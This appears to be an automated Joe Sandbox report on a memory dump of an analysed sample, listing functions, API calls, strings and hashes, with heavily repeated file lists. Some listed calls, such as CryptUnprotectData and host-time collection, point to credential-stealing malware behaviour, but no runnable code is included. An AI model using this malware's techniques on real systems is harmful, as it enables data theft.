!;m}, xrefs: 00A3E62D
^~L_, xrefs: 00A3E4C2

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !;m}$^~L_$jb~}$u<_
API String ID: 0-1641347417
Opcode ID: 1487a797005c215eb2bd85ffed140f28489d9dfe281ebdb39d013109b0a16e1d
Instruction ID: c5a0df27b46678e4c5be5944a023281f368bc737dfee9cf663fadbd913ac443f
Opcode Fuzzy Hash: 1487a797005c215eb2bd85ffed140f28489d9dfe281ebdb39d013109b0a16e1d
Instruction Fuzzy Hash: 1DB226F360C2049FD704AE2DEC8567ABBE9EFD4320F1A8A3DE6C5C7744E63558058692

Function 00A4BDA9 Relevance: 6.4, Strings: 4, Instructions: 1379COMMON

Download Yara Rule

Strings

K&=, xrefs: 00A4BE10
Y/=>, xrefs: 00A4C88D
gFzw, xrefs: 00A4C421
}cs*, xrefs: 00A4C352

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: K&=$Y/=>$gFzw$}cs*
API String ID: 0-2643627819
Opcode ID: 67e73df7ab32414d148dedff5e51b8e00298e2dc79ebb5e83a284ddbb7cde42e
Instruction ID: 7eccecddb329dfe5ef7a086b37807e3ad66e8dafa7bb6c4cd5928c0b85c169bc
Opcode Fuzzy Hash: 67e73df7ab32414d148dedff5e51b8e00298e2dc79ebb5e83a284ddbb7cde42e
Instruction Fuzzy Hash: 899217F3A0C2009FE7046E2DEC8567AFBE9EF94720F1A453DEAC4C7744E63598058696

Function 00609030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,005F51D4,40000001,00000000,00000000,?,005F51D4), ref: 00609050

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: bf2bee7fa5cf67150078cb8cb54ba0815dadd1e8da896d2caa62f9e046204c37
Instruction ID: 385f570c1bc976dccde09712acdb564d6901ea57020acbcdfa1a1fb2b72e93b9
Opcode Fuzzy Hash: bf2bee7fa5cf67150078cb8cb54ba0815dadd1e8da896d2caa62f9e046204c37
Instruction Fuzzy Hash: 5511C574244209EFDB08CF64D885FAB33BABF89310F108558FA5A8B391D775E9419BA4

Function 00607B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610DE8,00000000,?), ref: 00607B40
RtlAllocateHeap.NTDLL(00000000), ref: 00607B47
GetLocalTime.KERNEL32(?,?,?,?,?,00610DE8,00000000,?), ref: 00607B54
wsprintfA.USER32 ref: 00607B83

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 1adc12a821f7ca94e3c22f68e9a4121a51a4231aee26eafa2e1f1e8ff1fd6153
Instruction ID: b74638aabe35e3cd5f42765d766e59bbfb86985bd1064881458422d3c54fceb8
Opcode Fuzzy Hash: 1adc12a821f7ca94e3c22f68e9a4121a51a4231aee26eafa2e1f1e8ff1fd6153
Instruction Fuzzy Hash: FA1118B2908518AACB149BCADD45FBEB7B8FB48B11F10421AF605A2280D3395940CBB0

Function 00607BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F4F0F8,00000000,?,00610DF8,00000000,?,00000000,00000000), ref: 00607BF3
RtlAllocateHeap.NTDLL(00000000), ref: 00607BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F4F0F8,00000000,?,00610DF8,00000000,?,00000000,00000000,?), ref: 00607C0D
wsprintfA.USER32 ref: 00607C47

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: cbe9f478ca5567a6aa15c9c391f55678b9af3146f22d14701334c683b6ac34cb
Instruction ID: 016f5d0c454a8e3e91537a4de849241beae8bfb82bc084be20412c9f8dcbe465
Opcode Fuzzy Hash: cbe9f478ca5567a6aa15c9c391f55678b9af3146f22d14701334c683b6ac34cb
Instruction Fuzzy Hash: 22118EB1949218EFEB248B54DC45FAAB778FB44721F104395F61A932D0D7742A408F50

Function 00603970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0060E120,00000000,00000001,0060E110,00000000), ref: 006039A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00603A00

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 806b7e5f3d32b61c8b320bfc99add90f9989321a07e7f677e8a3cafb10614102
Instruction ID: 7d5a1764de83dd52a611802b1041ac163dba32dac3af4020d543fa337dc370ae
Opcode Fuzzy Hash: 806b7e5f3d32b61c8b320bfc99add90f9989321a07e7f677e8a3cafb10614102
Instruction Fuzzy Hash: 2941E770A40A289FDB24DB58CC95F9BB7B5BB48702F4041D8E609E72D0E7B16E85CF50

Function 005FA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005FA2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 005FA2F3
LocalFree.KERNEL32(?), ref: 005FA323

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 5224e85cefec644d30587a7ab92b2be057a60da87e51a63c142a20cc0ef86a02
Instruction ID: 400a554913be98f36392588bd40d17f4d7cb030b80d57cf6ecf15cc899726716
Opcode Fuzzy Hash: 5224e85cefec644d30587a7ab92b2be057a60da87e51a63c142a20cc0ef86a02
Instruction Fuzzy Hash: 8B11A8B4A00209DFCB04DFA4D985EAEB7B5FB89300F108559ED1597390D734AE50CF61

Function 00664BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON

Download Yara Rule

Strings

__ZN, xrefs: 00664FDF
?, xrefs: 006654D5

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?$__ZN
API String ID: 0-1427190319
Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
Instruction ID: 5f32f0659c0e29a5c83cfcbe11e8957a0bebdf5dfb03f7078ad2b97c9ecb98e0
Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
Instruction Fuzzy Hash: E8723372A08B509BD714CF14C8916AABBE3EFC5310F598A1DF8A69B391D771DC41CB82

Function 00645DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON

Download Yara Rule

Strings

xn--, xrefs: 00646009

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: xn--
API String ID: 0-2826155999
Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
Instruction ID: a5cbb71fa32574da9b36a82dc7bc67990700bc3ea8d5cb253281187f26c504e0
Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
Instruction Fuzzy Hash: 2EA2E4B1D042688AEF19CF58C8903EDB7B3EF56300F1842AAE4567B381D7755E85CB62

Function 00644DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00644DF3

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
Instruction ID: 9da57ef1a0d3f0331ae0558da14c8d43cc2d40c2dda2e0c88d4779e36350da2a
Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
Instruction Fuzzy Hash: 75E1BE316087419FC725DE28C8817AEB7E3EFC9300F554A2DE5DA9B392DB319845CB86

Function 00644868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00644893

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
Instruction ID: 926af773dc7fc42e64a266ed6c20d1d3b2b119964446bd8bf228fbb9f3ece454
Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
Instruction Fuzzy Hash: 1AE19031A087059FDB24CE18C8927AEB7E7EFC5310F158A2DE9999B351DB30EC458B46

Function 0065E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

UNC\, xrefs: 0065E5B4

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: UNC\
